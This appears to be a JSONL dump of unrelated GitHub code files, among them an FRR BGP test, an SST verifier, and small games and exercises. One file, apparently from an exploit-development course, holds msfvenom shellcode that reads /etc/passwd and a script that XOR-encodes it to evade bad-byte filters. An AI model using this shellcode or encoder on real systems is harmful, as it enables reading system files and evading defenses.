train_dataset=tokenized_train_dataset,\n eval_dataset=tokenized_test_dataset,\n tokenizer=tokenizer,\n data_collator=data_collator,\n# compute_metrics=custom_metrics,\n compute_metrics=compute_metrics,\n)\ntrainer.train()\ntrainer.save_model()\ntrainer.save_state()\n","repo_name":"jackking2333/Languange_model_scripts","sub_path":"train_bert.py","file_name":"train_bert.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23732326858","text":"import os\nimport sys\nimport json\nimport pytest\n\npytestmark = [pytest.mark.bgpd]\n\nCWD = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(os.path.join(CWD, \"../\"))\n\n# pylint: disable=C0413\nfrom lib.topogen import Topogen, TopoRouter, get_topogen\nfrom lib.common_config import step\n\npytestmark = [pytest.mark.bgpd]\n\n\ndef build_topo(tgen):\n for routern in range(1, 5):\n tgen.add_router(\"r{}\".format(routern))\n\n switch = tgen.add_switch(\"s1\")\n switch.add_link(tgen.gears[\"r1\"])\n switch.add_link(tgen.gears[\"r2\"])\n switch.add_link(tgen.gears[\"r3\"])\n switch.add_link(tgen.gears[\"r4\"])\n\n\ndef setup_module(mod):\n tgen = Topogen(build_topo, mod.__name__)\n tgen.start_topology()\n\n router_list = tgen.routers()\n\n for i, (rname, router) in enumerate(router_list.items(), 1):\n router.load_config(\n TopoRouter.RD_ZEBRA, os.path.join(CWD, \"{}/zebra.conf\".format(rname))\n )\n router.load_config(\n TopoRouter.RD_BGP, os.path.join(CWD, \"{}/bgpd.conf\".format(rname))\n )\n\n tgen.start_router()\n\n\ndef teardown_module(mod):\n tgen = get_topogen()\n tgen.stop_topology()\n\n\ndef test_bgp_default_ipv4_ipv6_unicast():\n tgen = get_topogen()\n\n if tgen.routers_have_failure():\n pytest.skip(tgen.errors)\n\n step(\"Check if neighbor 192.168.255.254 is enabled for ipv4 address-family only\")\n\n def _bgp_neighbor_ipv4_af_only():\n tgen.gears[\"r1\"].vtysh_cmd(\n \"conf t\\nrouter bgp\\nneighbor 192.168.255.254 remote-as external\"\n )\n\n output = json.loads(tgen.gears[\"r1\"].vtysh_cmd(\"show bgp summary json\"))\n\n if len(output.keys()) == 1 and \"ipv4Unicast\" in output:\n return True\n return False\n\n assert _bgp_neighbor_ipv4_af_only() == True\n\n step(\"Check if neighbor 192.168.255.254 is enabled for ipv6 address-family only\")\n\n def _bgp_neighbor_ipv6_af_only():\n tgen.gears[\"r2\"].vtysh_cmd(\n \"conf t\\nrouter bgp\\nneighbor 192.168.255.254 remote-as external\"\n )\n\n output = json.loads(tgen.gears[\"r2\"].vtysh_cmd(\"show bgp summary json\"))\n\n if len(output.keys()) == 1 and \"ipv6Unicast\" in output:\n return True\n return False\n\n assert _bgp_neighbor_ipv6_af_only() == True\n\n step(\"Check if neighbor 192.168.255.254 is enabled for evpn address-family only\")\n\n def _bgp_neighbor_evpn_af_only():\n tgen.gears[\"r3\"].vtysh_cmd(\n \"conf t\\nrouter bgp\\nneighbor 192.168.255.254 remote-as external\"\n )\n\n output = json.loads(tgen.gears[\"r3\"].vtysh_cmd(\"show bgp summary json\"))\n\n if len(output.keys()) == 1 and \"l2VpnEvpn\" in output:\n return True\n return False\n\n assert _bgp_neighbor_evpn_af_only() == True\n\n step(\n \"Check if neighbor 192.168.255.254 is enabled for ipv4/ipv6 unicast and evpn address-families\"\n )\n\n def _bgp_neighbor_ipv4_ipv6_and_evpn_af():\n tgen.gears[\"r4\"].vtysh_cmd(\n \"conf t\\nrouter bgp\\nneighbor 192.168.255.254 remote-as external\"\n )\n\n output = json.loads(tgen.gears[\"r4\"].vtysh_cmd(\"show bgp summary json\"))\n\n if (\n len(output.keys()) == 3\n and 
\"ipv4Unicast\" in output\n and \"ipv6Unicast\" in output\n and \"l2VpnEvpn\" in output\n ):\n return True\n return False\n\n assert _bgp_neighbor_ipv4_ipv6_and_evpn_af() == True\n\n\nif __name__ == \"__main__\":\n args = [\"-s\"] + sys.argv[1:]\n sys.exit(pytest.main(args))\n","repo_name":"FRRouting/frr","sub_path":"tests/topotests/bgp_default_afi_safi/test_bgp-default-afi-safi.py","file_name":"test_bgp-default-afi-safi.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":2787,"dataset":"github-code","pt":"40"} +{"seq_id":"28632105310","text":"#!/bin/python3\nimport random\nimport binascii\n\n\n# msfvenom -p linux/x86/read_file -f c PATH=/etc/passwd -b '\\x00'\npayload = b\"\\xbe\\xd4\\xa1\\x45\\x1e\\xda\\xc1\\xd9\\x74\\x24\\xf4\\x5d\\x29\\xc9\\xb1\\x13\\x31\\x75\\x13\\x83\\xed\\xfc\\x03\\x75\\xdb\\x43\\xb0\\xf5\\xd5\\x3b\\x3e\\x0a\\x19\\x3c\\x1a\\x3b\\xd0\\xf1\\x1c\\xb2\\x21\\xb1\\x1e\\xc5\\xa5\\xc2\\xa9\\x22\\x2c\\x3b\\x13\\xac\\x3e\\xbc\\x64\\x60\\xbe\\x35\\xa6\\xc2\\xba\\x45\\x27\\x33\\x79\\x44\\x27\\x33\\x7d\\x8a\\xa7\\x8b\\x7c\\x14\\xa8\\xeb\\xc5\\x14\\xa8\\xeb\\x39\\xd8\\x28\\x03\\xfc\\x1d\\xd7\\x2b\\xd1\\x84\\x5c\\xb7\\x02\\x37\\xfc\\x44\\x2f\\xc0\\x9a\\xaa\"\n\nbad_bytes = [ 0xff, 0x00 ]\n\noutput = \"\"\nfor b in payload:\n # new random byte to xor with\n while True:\n rand_byte = random.randbytes(1)\n\n # xor real shellcode byte with randomly generated byte\n new_shellcode_byte = b ^ int.from_bytes(rand_byte, 'little')\n\n # check if new shellcode will contatin 0xff or 0x00 \n if not rand_byte in bad_bytes and not new_shellcode_byte in bad_bytes:\n break\n print(\"FOUND 0xFF or 0x00 in rand_byte or new_shellcode_byte, generating new random byte!!\")\n \n # print(f\"{hex(b)} ^ {hex(int.from_bytes(rand_byte, 'little'))} = {hex(new_shellcode_byte)}\")\n output += '\\\\x' + binascii.hexlify(rand_byte).decode('utf-8')\n output += '\\\\x' + hex(new_shellcode_byte)[2:].zfill(2)\n\n# append our end stub to the end of our payload. 
This signifies the exit condition.\noutput += '\\\\xff\\\\xff'\n\n\nprint(f\"\\n{output}\\n\")\nprint(\", 0x\".join(output.split('\\\\x'))[2:])\nprint(\"\\nlength: \" + str(len(output.split('\\\\x')) - 1), \" - hex: \", str(hex(len(output.split('\\\\x')) - 1)))\n","repo_name":"alecmaly/slae","sub_path":"slae86/project4/custom_encode.py","file_name":"custom_encode.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29480117197","text":"melon_cost = 1.00\n\ndef customer_payment(path):\n \"\"\"Opens file, tokenizes llines, prints statement if expected amount not equal to paid amount \"\"\"\n customer_orders = open(path) # Open file at path\n # Iterate over lines in file\n for line in customer_orders:\n # Strip whitespace from end of line\n line = line.rstrip()\n # Split line along '|' to get list of strings\n words = line.split('|')\n # Unpack list of strings and name variables\n cust_num, cust_name, cust_melons, cust_paid = words\n cust_melons = int(cust_melons) # Change variable type from 'str' to 'int'\n cust_paid = float(cust_paid) # Change variable type from 'str' to 'float'\n\n # Calculate expected cost of customer order\n cust_expect = (cust_melons*melon_cost)\n \n # Compare expected cost to what customer paid, if overpaid print statement that they overpaid, if underpaid; print statement that they underpaid\n if cust_expect < cust_paid:\n print(f\"{cust_name} OVER paid for their melons\")\n if cust_expect > cust_paid:\n print(f\"{cust_name} UNDER paid for their melons\")\n # Close the file\n customer_orders.close()\n #return\n\n# Call the function\ncustomer_payment(\"/home/hackbright/src/homework/accounting/customer-orders.txt\")\n\n#*** Hackbright starting code below***\n# customer1_name = \"Joe\"\n# customer1_melons = 5\n# customer1_paid = 5.00\n\n# customer2_name = \"Frank\"\n# customer2_melons = 6\n# customer2_paid = 6.00\n\n# customer3_name = \"Sally\"\n# customer3_melons = 3\n# customer3_paid = 3.00\n\n# customer4_name = \"Sean\"\n# customer4_melons = 9\n# customer4_paid = 9.50\n\n# customer5_name = \"David\"\n# customer5_melons = 4\n# customer5_paid = 4.00\n\n# customer6_name = \"Ashley\"\n# customer6_melons = 3\n# customer6_paid = 2.00\n\n# customer1_expected = customer1_melons * melon_cost\n# if customer1_expected != customer1_paid:\n# print(f\"{customer1_name} paid ${customer1_paid:.2f},\",\n# f\"expected ${customer1_expected:.2f}\"\n# )\n\n# customer2_expected = customer2_melons * melon_cost\n# if customer2_expected != customer2_paid:\n# print(f\"{customer2_name} paid ${customer2_paid:.2f},\",\n# f\"expected ${customer2_expected:.2f}\"\n# )\n\n# customer3_expected = customer3_melons * melon_cost\n# if customer3_expected != customer3_paid:\n# print(f\"{customer3_name} paid ${customer3_paid:.2f},\",\n# f\"expected ${customer3_expected:.2f}\"\n# )\n\n# customer4_expected = customer4_melons * melon_cost\n# if customer4_expected != customer4_paid:\n# print(f\"{customer4_name} paid ${customer4_paid:.2f},\",\n# f\"expected ${customer4_expected:.2f}\"\n# )\n\n# customer5_expected = customer5_melons * melon_cost\n# if customer5_expected != customer5_paid:\n# print(f\"{customer5_name} paid ${customer5_paid:.2f},\",\n# f\"expected ${customer5_expected:.2f}\"\n# )\n\n# customer6_expected = customer6_melons * melon_cost\n# if customer6_expected != customer6_paid:\n# print(f\"{customer6_name} paid ${customer6_paid:.2f},\",\n# f\"expected ${customer6_expected:.2f}\"\n# 
)\n","repo_name":"mauratee/homework-accounting","sub_path":"accounting.py","file_name":"accounting.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26894881940","text":"import sys\nimport pygame.sprite\nimport pyganim\nimport Colors\nimport Levels\nimport Menu\nimport Monsters\nimport ScreenSettings\nimport main\n\nSPEED_MOVE = 5\nJUMP_POWER = 10\nGRAVITY = 0.35\n# WIDTH = 32\nWIDTH = 25\nHEIGHT = 32\n\nMOVE_EXTRA_SPEED = 2.5 # Укорение\nJUMP_EXTRA_POWER = 3 # доп сила прыжка\nANIMATION_SUPER_SPEED_DELAY = 1 # скорость смены кадров при ускорении\n\n# Переменные для анимации героя\nCHARACTER_DELAY = 1\nCHARACTER_RIGHT = ['images/Mario/1/r1.png',\n 'images/Mario/1/r2.png',\n 'images/Mario/1/r3.png',\n 'images/Mario/1/r4.png',\n 'images/Mario/1/r5.png']\nCHARACTER_LEFT = ['images/Mario/1/l1.png',\n 'images/Mario/1/l2.png',\n 'images/Mario/1/l3.png',\n 'images/Mario/1/l4.png',\n 'images/Mario/1/l5.png']\nCHARACTER_JUMP_LEFT = [('images/Mario/1/jl.png', 1)]\nCHARACTER_JUMP_RIGHT = [('images/Mario/1/jr.png', 1)]\nCHARACTER_JUMP = [('images/Mario/1/j.png', 1)]\nCHARACTER_STOP = [('images/Mario/1/0.png', 1)]\n\n\nclass Mario(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self) # Инициализатор встроенных классов Sprite\n self.startX = 40\n self.startY = 40\n self.health = 9\n self.xvel = 0 # скорость перемещения по горизонтали\n self.yvel = 0 # скорость перемещения по вертикали\n self.GroundPosition = False # на земеле или нет\n self.image = pygame.Surface((WIDTH, HEIGHT))\n self.image.fill(Colors.PURPLE)\n self.rect = pygame.Rect(x, y, WIDTH, HEIGHT)\n self.jump = pygame.mixer.Sound(r'music/jump.wav')\n self.win = pygame.mixer.Sound(r'music/win.wav') # еще не спас принцессу\n self.dead = pygame.mixer.Sound(r'music/dead.wav')\n\n self.image.set_colorkey(Colors.PURPLE) # прозрачный фон\n persAnim = []\n persAnimSuperSpeed = []\n for anim in CHARACTER_RIGHT:\n persAnim.append((anim, CHARACTER_DELAY))\n persAnimSuperSpeed.append((anim, ANIMATION_SUPER_SPEED_DELAY))\n self.persAnimRight = pyganim.PygAnimation(persAnim)\n self.persAnimRight.play()\n self.persAnimRightSuperSpeed = pyganim.PygAnimation(persAnimSuperSpeed)\n self.persAnimRightSuperSpeed.play()\n\n persAnim = []\n persAnimSuperSpeed = []\n for anim in CHARACTER_LEFT:\n persAnim.append((anim, CHARACTER_DELAY))\n persAnimSuperSpeed.append((anim, ANIMATION_SUPER_SPEED_DELAY))\n self.persAnimLeft = pyganim.PygAnimation(persAnim)\n self.persAnimLeft.play()\n self.persAnimLeftSuperSpeed = pyganim.PygAnimation(persAnimSuperSpeed)\n self.persAnimLeftSuperSpeed.play()\n\n self.persAnimStay = pyganim.PygAnimation(CHARACTER_STOP)\n self.persAnimStay.play()\n self.persAnimStay.blit(self.image, (0, 0)) # По-умолчанию, стоим\n\n self.persAnimJumpLeft = pyganim.PygAnimation(CHARACTER_JUMP_LEFT)\n self.persAnimJumpLeft.play()\n\n self.persAnimJumpRight = pyganim.PygAnimation(CHARACTER_JUMP_RIGHT)\n self.persAnimJumpRight.play()\n\n self.persAnimJump = pyganim.PygAnimation(CHARACTER_JUMP)\n self.persAnimJump.play()\n\n def update(self, platforms, running):\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]: # движение влево\n self.xvel = -SPEED_MOVE\n self.image.fill(Colors.PURPLE)\n if running:\n self.xvel -= MOVE_EXTRA_SPEED\n if not keys[pygame.K_UP] or not keys[pygame.K_SPACE]:\n self.persAnimLeftSuperSpeed.blit(self.image, (0, 0))\n else:\n if not keys[pygame.K_UP] or not keys[pygame.K_SPACE]:\n 
self.persAnimLeft.blit(self.image, (0, 0))\n if keys[pygame.K_UP] or keys[pygame.K_SPACE]:\n self.persAnimJumpLeft.blit(self.image, (0, 0))\n\n if keys[pygame.K_RIGHT]: # движение вправо\n self.xvel = SPEED_MOVE\n self.image.fill(Colors.PURPLE)\n if running:\n self.xvel += MOVE_EXTRA_SPEED\n if not keys[pygame.K_UP] or not keys[pygame.K_SPACE]:\n self.persAnimRightSuperSpeed.blit(self.image, (0, 0))\n else:\n if not keys[pygame.K_UP] or not keys[pygame.K_SPACE]:\n self.persAnimRight.blit(self.image, (0, 0))\n if keys[pygame.K_UP] or keys[pygame.K_SPACE]:\n self.persAnimJumpRight.blit(self.image, (0, 0))\n\n if keys[pygame.K_UP] or keys[pygame.K_SPACE]: # прыжок\n if self.GroundPosition:\n self.yvel = -JUMP_POWER\n if running and (keys[pygame.K_RIGHT] or keys[pygame.K_LEFT]):\n self.yvel -= JUMP_EXTRA_POWER\n self.jump.play()\n self.image.fill(Colors.PURPLE)\n self.persAnimJump.blit(self.image, (0, 0))\n\n if not (keys[pygame.K_LEFT] or keys[pygame.K_RIGHT]): # стоим на месте\n self.xvel = 0\n if not (keys[pygame.K_UP] or keys[pygame.K_SPACE]):\n self.image.fill(Colors.PURPLE)\n self.persAnimStay.blit(self.image, (0, 0))\n\n if keys[pygame.K_LCTRL] and keys[pygame.K_s]:\n self.startX = self.rect.x\n self.startY = self.rect.y\n\n if not self.GroundPosition:\n self.yvel += GRAVITY\n\n self.GroundPosition = False\n self.rect.y += self.yvel\n self.collide(0, self.yvel, platforms)\n self.rect.x += self.xvel\n self.collide(self.xvel, 0, platforms)\n\n def collide(self, xvel, yvel, platforms):\n for platf in platforms:\n if pygame.sprite.collide_rect(self, platf): # если есть пересечение платформы с игроком\n if xvel > 0: # если движется вправо\n self.rect.right = platf.rect.left # то не движется вправо\n\n if xvel < 0: # если движется влево\n self.rect.left = platf.rect.right # то не движется влево\n\n if yvel > 0: # если падает вниз\n self.rect.bottom = platf.rect.top # то не падает вниз\n self.GroundPosition = True # и становится на что-то твердое\n self.yvel = 0 # и энергия падения пропадает\n\n if yvel < 0: # если движется вверх\n self.rect.top = platf.rect.bottom # то не движется вверх\n self.yvel = 0 # и энергия прыжка пропадает\n\n if isinstance(platf, Levels.DieBlock) or isinstance(platf, Monsters.Monster):\n self.die()\n\n elif isinstance(platf, Levels.Princes):\n main.menu_sound.stop()\n self.win.play()\n pygame.time.wait(4000)\n end_bg = pygame.image.load(r'images/backgrounds/level_passed.jpg')\n ScreenSettings.gameScreen.blit(end_bg, (0, 0))\n pygame.display.update()\n pygame.time.wait(1500)\n Menu.menu()\n\n def die(self):\n if self.health == 0:\n main.menu_sound.stop()\n self.dead.play()\n pygame.time.wait(1000)\n end_bg = pygame.image.load(r'images/backgrounds/background_end.jpg')\n ScreenSettings.gameScreen.blit(end_bg, (0, 0))\n pygame.display.update()\n pygame.time.wait(2000)\n sys.exit(-1)\n self.health -= 1\n\n self.teleporting(self.startX, self.startY)\n\n def teleporting(self, go_x, go_y):\n self.rect.x = go_x\n self.rect.y = go_y\n","repo_name":"Nezoxxxd/git-KourseGame","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5299115315","text":"import os\nimport re\n\nimport numpy as np\nimport numpy.ma as ma\nfrom netCDF4._netCDF4 import Dataset\n\nfrom cci.sst.qa.product_type import L2P, L3U, L4\nfrom cci.sst.qa.verification_error import VerificationError\n\n\nclass SstProductVerifier:\n\n def __init__(self, report, 
source_pathname):\n self.report = report\n self.source_pathname = source_pathname\n self.filename_patterns = {'[0-9]{14}-ESACCI-L2P_GHRSST-.*\\\\.nc': L2P(), '[0-9]{14}-ESACCI-L3U_GHRSST-.*\\\\.nc': L3U(), '[0-9]{14}-ESACCI-L4_GHRSST-.*\\\\.nc': L4(), }\n\n def check_source_pathname(self):\n ok = os.path.isfile(self.source_pathname)\n if ok:\n self.report['source_pathname_check'] = float(0)\n else:\n self.report['source_pathname_check'] = float(1)\n self.report['source_pathname_check_failed_for'] = self.source_pathname\n raise VerificationError\n\n def check_source_filename(self):\n \"\"\"\n\n :rtype : ProductType\n \"\"\"\n product_type = None\n\n filename = os.path.basename(self.source_pathname)\n for p, t in self.filename_patterns.items():\n if re.match(p, filename):\n product_type = t\n break\n\n if product_type is not None:\n self.report['source_filename_check'] = float(0)\n return product_type\n else:\n self.report['source_filename_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report['source_filename_check_failed_for'] = filename\n raise VerificationError\n\n def check_product_can_be_opened(self):\n \"\"\"\n\n :rtype : Dataset\n \"\"\"\n try:\n dataset = Dataset(self.source_pathname)\n dataset.set_auto_maskandscale(False)\n self.report['product_can_be_opened_check'] = float(0)\n return dataset\n except:\n self.report['product_can_be_opened_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report['product_can_be_opened_check_failed_for'] = filename\n raise VerificationError\n\n def check_product_version(self, dataset):\n \"\"\"\n\n :rtype : str\n \"\"\"\n try:\n version = dataset.getncattr(\"product_version\")\n if version is None:\n raise VerificationError\n\n self.report['product_has_version_check'] = float(0)\n return version\n except:\n self.report['product_has_version_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report['product_has_version_failed_for'] = filename\n raise VerificationError\n\n def check_dataset(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n try:\n self._check_variable_existence(dataset, product_type)\n self._check_variable_limits(dataset)\n self._check_geophysical(dataset, product_type)\n self._check_sst_quality(dataset, product_type)\n self._check_mask_consistency(dataset, product_type)\n self._check_corruptness(dataset, product_type)\n finally:\n try:\n dataset.close()\n except IOError:\n pass\n\n def _check_variable_existence(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n for variable_name in product_type.get_variable_names():\n if variable_name in dataset.variables:\n self.report[variable_name + '.existence_check'] = float(0)\n else:\n self.report[variable_name + '.existence_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report[variable_name + '.existence_check_failed_for'] = filename\n\n def _check_variable_limits(self, dataset):\n \"\"\"\n\n :type dataset: Dataset\n \"\"\"\n for variable_name in dataset.variables:\n variable = dataset.variables[variable_name]\n self.report[variable_name + '.count.total'] = float(variable.size)\n\n data = self.__get_masked_data(variable)\n self.report[variable_name + '.count.valid'] = float(data.count())\n\n try:\n valid_max = variable.getncattr('valid_max')\n invalid_data = ma.masked_less_equal(data, valid_max)\n invalid_data_count = invalid_data.count()\n if invalid_data_count 
== 0:\n self.report[variable_name + '.valid_max_check'] = float(invalid_data_count)\n else:\n variable.getncattr('_FillValue')\n self.report[variable_name + '.valid_max_check'] = float(invalid_data_count)\n filename = os.path.basename(self.source_pathname)\n self.report[variable_name + '.valid_max_check_failed_for'] = filename\n except AttributeError:\n pass\n try:\n valid_min = variable.getncattr('valid_min')\n invalid_data = ma.masked_greater_equal(data, valid_min)\n invalid_data_count = invalid_data.count()\n self.report[variable_name + '.valid_min_check'] = float(invalid_data_count)\n if invalid_data_count == 0:\n self.report[variable_name + '.valid_min_check'] = float(invalid_data_count)\n else:\n variable.getncattr('_FillValue')\n self.report[variable_name + '.valid_min_check'] = float(invalid_data_count)\n filename = os.path.basename(self.source_pathname)\n self.report[variable_name + '.valid_min_check_failed_for'] = filename\n except AttributeError:\n pass\n\n def _check_geophysical(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n spec = product_type.get_geophysical_check_spec()\n if len(spec) == 4:\n a = SstProductVerifier.__get_data(dataset, spec[0], scale=True)\n b = SstProductVerifier.__get_data(dataset, spec[1], scale=True)\n d = a - b\n # count pixels with differences less than the minimum\n suspicious_data = ma.masked_greater_equal(d, spec[2])\n suspicious_data_count = suspicious_data.count()\n self.report['geophysical_minimum_check'] = float(suspicious_data_count)\n if suspicious_data_count > 0:\n filename = os.path.basename(self.source_pathname)\n self.report['geophysical_minimum_check_failed_for'] = filename\n # count pixels with differences greater than the maximum\n suspicious_data = ma.masked_less_equal(d, spec[3])\n suspicious_data_count = suspicious_data.count()\n self.report['geophysical_maximum_check'] = float(suspicious_data_count)\n if suspicious_data_count > 0:\n filename = os.path.basename(self.source_pathname)\n self.report['geophysical_maximum_check_failed_for'] = filename\n\n def _check_sst_quality(self, dataset, product_type):\n mask_specs = product_type.get_mask_consistency_check_specs()\n if len(mask_specs) == 0:\n return\n\n sst_variable_names = product_type.get_sst_variable_names()\n if len(sst_variable_names) == 0:\n return\n\n quality_variable_name = mask_specs[0][2]\n quality_data = dataset.variables[quality_variable_name][:]\n\n valid_retrieval_quality = ma.masked_less(quality_data, 2)\n self.report[\"sst_valid_retrieval\"] = float(valid_retrieval_quality.count())\n\n failed_retrieval_quality = ma.masked_not_equal(quality_data, 1)\n sst_variable = dataset.variables[sst_variable_names[0]]\n fill_value = sst_variable.getncattr('_FillValue')\n sst_quality_one_data = ma.array(sst_variable[:], mask=failed_retrieval_quality.mask)\n\n invalid_retrieval = ma.masked_equal(sst_quality_one_data, fill_value)\n self.report[\"sst_invalid_retrieval\"] = float(invalid_retrieval.count())\n\n failed_retrieval = ma.masked_not_equal(sst_quality_one_data, fill_value)\n self.report[\"sst_failed_retrieval\"] = float(failed_retrieval.count())\n\n not_ocean = ma.masked_not_equal(quality_data, 0)\n self.report[\"not_ocean\"] = float(not_ocean.count())\n\n def _check_mask_consistency(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n\n consistency_check_specs = product_type.get_mask_consistency_check_specs()\n if len(consistency_check_specs) == 0:\n 
return\n\n quality_variable_name = consistency_check_specs[0][2]\n quality_data = dataset.variables[quality_variable_name][:]\n quality_masks = {}\n for level in range(0, 6):\n level_mask = ma.masked_not_equal(quality_data, level).mask\n quality_masks.update({level: level_mask})\n\n for spec in consistency_check_specs:\n reference_variable_name = spec[0]\n objective_variable_name = spec[1]\n quality_variable_name = spec[2]\n\n if quality_variable_name in dataset.variables:\n quality_levels = spec[3]\n for l in quality_levels:\n level_mask = quality_masks[l]\n a = SstProductVerifier.__get_data_of_quality(dataset, reference_variable_name, level_mask).mask\n b = SstProductVerifier.__get_data_of_quality(dataset, objective_variable_name, level_mask).mask\n # false negatives: element is not masked in a, but masked in b\n check_name = objective_variable_name + '.' + 'mask_false_negative_check_' + str(l)\n self.__check_false_negatives(a, b, check_name)\n # false positives: element is masked in a, but not masked in b\n check_name = objective_variable_name + '.' + 'mask_false_positive_check_' + str(l)\n self.__check_false_positives(a, b, check_name)\n else:\n a = SstProductVerifier.__get_data(dataset, reference_variable_name).mask\n b = SstProductVerifier.__get_data(dataset, objective_variable_name).mask\n # false negatives: element is not masked in a, but masked in b\n check_name = objective_variable_name + '.mask_false_negative_check'\n self.__check_false_negatives(a, b, check_name)\n # false positives: element is masked in a, but not masked in b\n check_name = objective_variable_name + '.' + 'mask_false_positive_check'\n self.__check_false_positives(a, b, check_name)\n\n def _check_corruptness(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n ok = True\n for variable_name in product_type.get_sst_variable_names():\n if variable_name in dataset.variables:\n variable = dataset.variables[variable_name]\n\n data = SstProductVerifier.__get_masked_data(variable)\n valid_data_count = data.count()\n if valid_data_count == 0:\n ok = False\n try:\n valid_max = variable.getncattr('valid_max')\n invalid_data = ma.masked_less_equal(data, valid_max)\n valid_data_count = valid_data_count - invalid_data.count()\n except AttributeError:\n pass\n try:\n valid_min = variable.getncattr('valid_min')\n invalid_data = ma.masked_greater_equal(data, valid_min)\n valid_data_count = valid_data_count - invalid_data.count()\n except AttributeError:\n pass\n if valid_data_count == 0:\n ok = False\n else:\n ok = False\n if ok:\n self.report['corruptness_check'] = float(0)\n else:\n self.report['corruptness_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report['corruptness_check_failed_for'] = filename\n raise VerificationError\n\n @staticmethod\n def __get_masked_data(variable):\n \"\"\"\n\n :type variable: Variable\n :rtype : ma.MaskedArray\n \"\"\"\n data = variable[:]\n try:\n fill_value = variable.getncattr('_FillValue')\n return ma.masked_equal(data, fill_value)\n except AttributeError:\n return ma.array(data)\n\n @staticmethod\n def __get_data(dataset, variable_name, scale=False):\n \"\"\"\n\n :type dataset: Dataset\n :type variable_name: str\n :type scale: bool\n :rtype : ma.MaskedArray\n \"\"\"\n variable = dataset.variables[variable_name]\n data = SstProductVerifier.__get_masked_data(variable)\n if scale:\n scale_factor, add_offset = SstProductVerifier._get_scale_and_offset(variable)\n if scale_factor != 1.0 or add_offset != 
0.0:\n data = data * scale_factor + add_offset\n return data\n\n @staticmethod\n def __get_data_of_quality(dataset, variable_name, level_mask, scale=False):\n \"\"\"\n\n :type dataset: Dataset\n :type variable_name: str\n :type level_mask: Object\n :type scale: bool\n :rtype : ma.MaskedArray\n \"\"\"\n variable = dataset.variables[variable_name]\n data = SstProductVerifier.__get_masked_data_of_quality(variable, level_mask)\n if scale:\n scale_factor, add_offset = SstProductVerifier._get_scale_and_offset(variable)\n if scale_factor != 1.0 or add_offset != 0.0:\n data = data * scale_factor + add_offset\n\n return data\n\n @staticmethod\n def __get_masked_data_of_quality(variable, level_mask):\n \"\"\"\n\n :type variable: Variable\n :type level_mask: Object\n :rtype : ma.MaskedArray\n \"\"\"\n data = ma.array(variable[:], mask=level_mask)\n try:\n fill_value = variable.getncattr('_FillValue')\n return ma.masked_equal(data, fill_value)\n except AttributeError:\n return data\n\n def __check_false_negatives(self, reference_mask, objective_mask, check_name):\n # noinspection PyNoneFunctionAssignment,PyUnresolvedReferences\n false_negatives = ma.masked_equal(np.logical_or(np.logical_not(reference_mask), objective_mask), True)\n false_negatives_count = false_negatives.count()\n self.report[check_name] = float(false_negatives_count)\n if false_negatives_count > 0:\n filename = os.path.basename(self.source_pathname)\n self.report[check_name + '_failed_for'] = filename\n\n def __check_false_positives(self, reference_mask, objective_mask, check_name):\n # noinspection PyNoneFunctionAssignment,PyUnresolvedReferences\n false_positives = ma.masked_equal(np.logical_or(np.logical_not(objective_mask), reference_mask), True)\n false_positives_count = false_positives.count()\n self.report[check_name] = float(false_positives_count)\n if false_positives_count > 0:\n filename = os.path.basename(self.source_pathname)\n self.report[check_name + '_failed_for'] = filename\n\n @staticmethod\n def _get_scale_and_offset(variable):\n try:\n scale_factor = variable.getncattr('scale_factor')\n except AttributeError:\n scale_factor = 1.0\n\n try:\n add_offset = variable.getncattr('add_offset')\n except AttributeError:\n add_offset = 0.0\n\n return scale_factor, add_offset\n","repo_name":"bcdev/sst-cci-toolbox","sub_path":"quality-assessment/cci/sst/qa/sst_product_verifier.py","file_name":"sst_product_verifier.py","file_ext":"py","file_size_in_byte":16024,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"22394406875","text":"import operative\nimport sketch\nfrom random_word import RandomWords\n\n\nprint('H A N G M A N')\n\ndifficulty = 'X'\n\nwhile difficulty not in 'EMH':\n print('Select difficulty: E - Easy, M - Medium, H - Hard')\n difficulty = input()[0].upper()\n\nmax_length = operative.set_max_length(difficulty)\n\nmissed_letters = ''\ncorrect_letters = ''\nsecret_word = (\n RandomWords()\n .get_random_word(\n hasDictionaryDef=\"true\",\n maxLength=max_length\n )\n)\n\ngame_is_done = False\n\nwhile True:\n operative.display_board(missed_letters, correct_letters, secret_word)\n\n # Let the player enter a letter.\n guess = operative.get_guess(missed_letters + correct_letters)\n\n if guess in secret_word:\n correct_letters = correct_letters + guess\n\n # Check if the player has won.\n found_all_letters = True\n for i in range(len(secret_word)):\n if secret_word[i] not in correct_letters:\n found_all_letters = False\n break\n if found_all_letters:\n print('Yes! 
